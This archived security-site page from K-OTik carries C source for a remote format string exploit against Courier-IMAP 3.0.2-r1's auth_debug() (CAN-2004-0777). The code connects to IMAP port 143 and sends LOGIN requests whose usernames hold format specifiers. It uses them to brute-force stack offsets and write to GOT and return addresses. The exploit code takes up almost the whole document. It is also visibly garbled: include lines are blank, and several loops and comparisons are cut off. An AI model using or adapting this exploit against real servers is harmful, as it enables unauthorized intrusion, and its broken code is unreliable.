K-OTik : Courier-IMAP <meta content="MS04-007,Exploit" name="keywords"> <meta content="MS04-007 Exploit" name="description"> <meta http-equiv="MSThemeCompatible" content="Yes"> <style type="text/css"> BODY { SCROLLBAR-ARROW-COLOR: #204558; SCROLLBAR-BASE-COLOR: #bdbcbc } SELECT { FONT-SIZE: 11px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } TEXTAREA { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } .bginput { FONT-SIZE: 12px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif; BACKGROUND-COLOR: #cfcfcf } A:link { COLOR: #000020; TEXT-DECORATION: none } A:visited { COLOR: #000020; TEXT-DECORATION: none } A:active { COLOR: #000020; TEXT-DECORATION: none } A:hover { COLOR: #000020; TEXT-DECORATION: none } #cat A:link { COLOR: #204558; TEXT-DECORATION: none } #cat A:visited { COLOR: #204558; TEXT-DECORATION: none } #cat A:active { COLOR: #204558; TEXT-DECORATION: none } #cat A:hover { COLOR: #204558; TEXT-DECORATION: none } #ltlink A:link { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:visited { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:active { COLOR: #000020; TEXT-DECORATION: none } #ltlink A:hover { COLOR: #000020; TEXT-DECORATION: none } .thtcolor { COLOR: #204558 } .bordert { BORDER-RIGHT: #a9a9ac 1px solid; BORDER-TOP: #a9a9ac 1px solid; BORDER-LEFT: #a9a9ac 1px solid; BORDER-BOTTOM: #a9a9ac 1px solid } td {font-family:arial,helvetica,sans-serif;font-size:x-small;}.tableborder { border:1px solid #345487;background-color:#FFF; padding:0; margin:0;width:100%;align:center } .post2 { background-color: #EEF2F7 } .postcolor { font-size: 12px; line-height: 160% } table { border:0px none;border-spacing:0;border-collapse:collapse } </style>

Courier-IMAP 3.0.2-r1 auth_debug() Remote Format String Exploit

/* CAN-2004-0777 */

/*
  courier-imap 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

#define BIGBUF 2048

#define IMAP_PORT 143

#define END_BRUTEFORCE_STACK 5500

#define TOP_STACK 0xbfc00000 /* FreeBSD */

#define START_BRUTEFORCE_SAVED_EBP 3000

#define JUNK 9

#define GAP_EBP_ESP 48

#define DUMMY_NUMBER 100


void die(int type, char *message) {
 if(type == 2)
 perror(message);
    else
     fprintf(stderr,"%s\n",message);
 exit(1);
}

int connect_to (char *host, int port){
 struct hostent *h;
 struct sockaddr_in c;
 int sock;

 if ((host == NULL) || (*host == (char) 0))
   die(1, "[-] Invalid hostname");

 if ((c.sin_addr.s_addr = inet_addr (host)) == -1){
   if ((h = gethostbyname (host)) == NULL)
  die(1, "[-] Cannot resolve host");
   memcpy ((char *) &c.sin_addr, (char *) h->h_addr, sizeof (c.sin_addr));
 }
 if ((sock = socket (PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
   die(2,"[-] Error creating socket:");
 c.sin_family = PF_INET;
 c.sin_port = htons (port);
 if (connect (sock, (struct sockaddr *) &c, sizeof (c)) == -1)
   die(2, "[-] Cannot connect: ");
 return sock;
}

void close_socket (int sock){
 shutdown (sock, 2);
 close (sock);
}

char *get_request(char *username, char *password){
 char *request = (char *)malloc(strlen(username)+strlen(password)+20);
 sprintf(request,"1 LOGIN \"%s\" \"%s\"\r\n",username, password);
 return request;
}

void send_data(int sock, char *request){
 int n;
 n = send (sock, request, strlen (request), 0);
 if (n != strlen (request)){
        close_socket (sock);
        die(1, "Error sending request\n");
 }
}


int get_ce_number(char *host, int port){
 int sock;
 int loop;
 char temp[BIGBUF];
 int l,n;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 
 for (loop = END_BRUTEFORCE_STACK;;loop--){
 sock = connect_to(host, port);
 n = recv (sock, temp, sizeof (temp), 0);
 sprintf(password,"sm00ny");
 sprintf(username,"%%%d$p",loop);
 request = get_request(username,password);
 send_data(sock,request);
 memset(temp,0,sizeof(temp));
 n = recv (sock, temp, sizeof (temp), 0);
 close_socket (sock);
 if (n > 0)
  break;
 }
 return loop;
}


int get_se_number(int start, int end, char *host, int port){
 int loop;
 char username[BIGBUF];
 char password[BIGBUF];
 char *request;
 int l,n;
 char temp[BIGBUF];
 int sock;
 if (!start)
 start = START_BRUTEFORCE_SAVED_EBP;
 for (loop = start; loop  0)
  break;
 }
 if (loop == end)
 return -1;
 
 return loop;
}





int verify_se_number(int write, unsigned long addy, int number, char *host, int port){
    char username[BIGBUF];
    char password[BIGBUF];
    char temp[BIGBUF];
    char *request;
    int n, sock;
    
    sock = connect_to(host, port);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    sprintf(password,"sm00ny");
    sprintf(username,"%%%uu%%%u$hn%%%u$hn", (addy & 0xffff) - JUNK, number, write);
    request = get_request(username,password);
    send_data(sock,request);
    memset(temp,0,sizeof(temp));
    n = recv (sock, temp, sizeof (temp), 0);
    close_socket (sock);
    if (n  0)
     return 0;
     
    return 1;
}
                                                                            
                                                                            
int *get_format_vector(unsigned long got_addy, unsigned long got, unsigned long ret){
 int i,j,sum,byte;
 int *vec = (int *)malloc(11 * sizeof(int));
 
 sum = JUNK;
 for (i=0; i> (16*j)) & 0xffff;
  vec[2*(2 * i + j) + 1] = byte - sum;
  while (vec[2*(2 * i + j) + 1] > (16*i)) & 0xffff;
 vec[8+i] = byte - sum;
 while (vec[8+i]  1)
  host = argv[1];

 printf("courier-imap